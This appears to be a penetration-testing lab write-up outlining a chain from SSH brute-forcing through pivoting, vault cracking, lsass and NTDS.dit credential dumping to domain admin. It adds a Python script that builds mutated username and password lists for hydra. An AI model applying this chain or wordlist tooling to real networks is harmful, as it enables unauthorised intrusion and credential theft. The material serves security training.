1) given first and last name as well as a commonly reused password
   1) also a topology of targets
2) `nmap` shows only ssh open on DMZ01
3) generate a mutated username list with `username-anarchy`
4) write a custom `hashcat` rule and use it to generate a mutated password list
5) brute-force ssh on DMZ01 with `hydra` using the mutated username and password lists
6) enumerate DMZ01 using common cred hunting methods
   1) creds for hwilliam related to FILE01 found in `.bash_history`
7) pivot into the internal network with `ligolo-ng` OR `ssh -D` + `proxychains4` (tested both methods)
8) `smbclient` into FILE01 with hwilliam
   1) need the domain prefixed to the username to connect
   2) loot a Password Safe v3 vault
9) use `pwsafe2john` to extract a crackable hash from the vault and crack it with `john` using `--format=pwsafe`
   1) loot more creds
   2) note that this is an old backup, so some creds may be stale
10) generate hosts, creds, names and passwords files for `netexec` (`nxc`) spraying
11) `smbclient` into FILE01 with bdavid
    1) dead-end
12) `nxc rdp` scan of all hosts
    1) bdavid rdp PWNED on JUMP01
13) `xfreerdp3` into JUMP01 as bdavid
14) check privs with `whoami /all` and `whoami /priv`
    1) we have local admin and remote mgmt
15) `evil-winrm` into JUMP01 with bdavid for easy file transfer
    1) make a local copy of `lsass.dmp` and move it to Kali
16) `pypykatz` on `lsass.dmp`
    1) NT hash for JUMP01$ (machine account)
    2) new password for stom
17) `nxc` scans with stom
    1) stom winrm PWNED on DC01
18) `evil-winrm` into DC01 with stom for easy file transfer
19) check privs with `whoami /all` and `whoami /priv`
    1) we have all privs
20) create a copy of the `HKLM\system` hive and move it to Kali
21) create a volume shadow copy of `C:\` and extract `NTDS.dit` from it, then move it to Kali
22) `impacket-secretsdump` offline against the SYSTEM hive and `NTDS.dit` to reveal the Administrator's NTLM hash
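The list generation in steps 3 to 5 can be reproduced without the external tools. The following is an added example written for this page; it is not part of the original notes nor code from `username-anarchy` or `hashcat`. It emits the common username formats for a first/last name and implements a small subset of hashcat's rule syntax (`:`, `l`, `u`, `c`, `C`, `t`, `r`, `d`, `[`, `]`, `$X`, `^X`, `sXY`), so the same rule text can later be saved and passed to `hashcat -r` unchanged. The name `Alex Smith`, the seed `Password` and the rule lines are constructed sample values, not the lab's.

```python
"""Added example: build mutated username and password lists for the hydra
brute-force in step 5, standing in for username-anarchy (step 3) and a
custom hashcat rule (step 4). All names, seed passwords and rule lines
below are constructed sample values, not the lab's."""
from pathlib import Path
from typing import List


def username_candidates(first: str, last: str) -> List[str]:
    """Common corporate username formats built from a first/last name
    (a subset of what username-anarchy emits); order kept, duplicates dropped."""
    f, l = first.lower(), last.lower()
    forms = [
        f, l, f + l, f + "." + l, f + "_" + l, f + "-" + l,
        f[0] + l, f[0] + "." + l, f + l[0], f + "." + l[0],
        l + f, l + "." + f, l + f[0], l[0] + f,
    ]
    return list(dict.fromkeys(forms))


def apply_rule(word: str, rule: str) -> str:
    """Apply one hashcat rule line to a word, functions left to right.

    Supported subset: ':' no-op, 'l' lowercase, 'u' uppercase, 'c' capitalize,
    'C' invert capitalize, 't' toggle case, 'r' reverse, 'd' duplicate,
    '[' drop first char, ']' drop last char, '$X' append X, '^X' prepend X,
    'sXY' replace every X with Y. Spaces between functions are ignored."""
    w, i = word, 0
    while i < len(rule):
        op = rule[i]
        if op == " " or op == ":":
            pass
        elif op == "l":
            w = w.lower()
        elif op == "u":
            w = w.upper()
        elif op == "c":
            w = w[:1].upper() + w[1:].lower()
        elif op == "C":
            w = w[:1].lower() + w[1:].upper()
        elif op == "t":
            w = w.swapcase()
        elif op == "r":
            w = w[::-1]
        elif op == "d":
            w = w + w
        elif op == "[":
            w = w[1:]
        elif op == "]":
            w = w[:-1]
        elif op == "$":
            i += 1
            w = w + rule[i]
        elif op == "^":
            i += 1
            w = rule[i] + w
        elif op == "s":
            w = w.replace(rule[i + 1], rule[i + 2])
            i += 2
        else:
            raise ValueError(f"unsupported rule function {op!r} in {rule!r}")
        i += 1
    return w


# Constructed rule file in hashcat syntax: one rule per line, '#' starts a comment.
RULES = """\
# year/symbol/leet mutations of a known, reused password
:
c
u
c $1
c $!
c $1 $2 $3
c $2 $0 $2 $4
c $2 $0 $2 $4 $!
sa@ c
sa@ c $2 $0 $2 $4 $!
"""


def mutate_passwords(seed: str, rules_text: str) -> List[str]:
    """Run every rule line over the seed password; drop duplicates, keep order."""
    out = []
    for line in rules_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        out.append(apply_rule(seed, line))
    return list(dict.fromkeys(out))


def write_wordlists(users: List[str], passwords: List[str], outdir: str = ".") -> None:
    """Write the two files hydra consumes: hydra -L users.txt -P passwords.txt ssh://<target>"""
    Path(outdir, "users.txt").write_text("\n".join(users) + "\n")
    Path(outdir, "passwords.txt").write_text("\n".join(passwords) + "\n")


if __name__ == "__main__":
    users = username_candidates("Alex", "Smith")     # constructed name
    passwords = mutate_passwords("Password", RULES)  # constructed seed
    write_wordlists(users, passwords)
    print(f"{len(users)} usernames, {len(passwords)} passwords written")
```

Keep the rule list short and ordered by likelihood: hydra tries every user/password pair, and ssh brute-forcing is slow and noisy, so 14 usernames times 9 passwords is already over a hundred attempts against a single host.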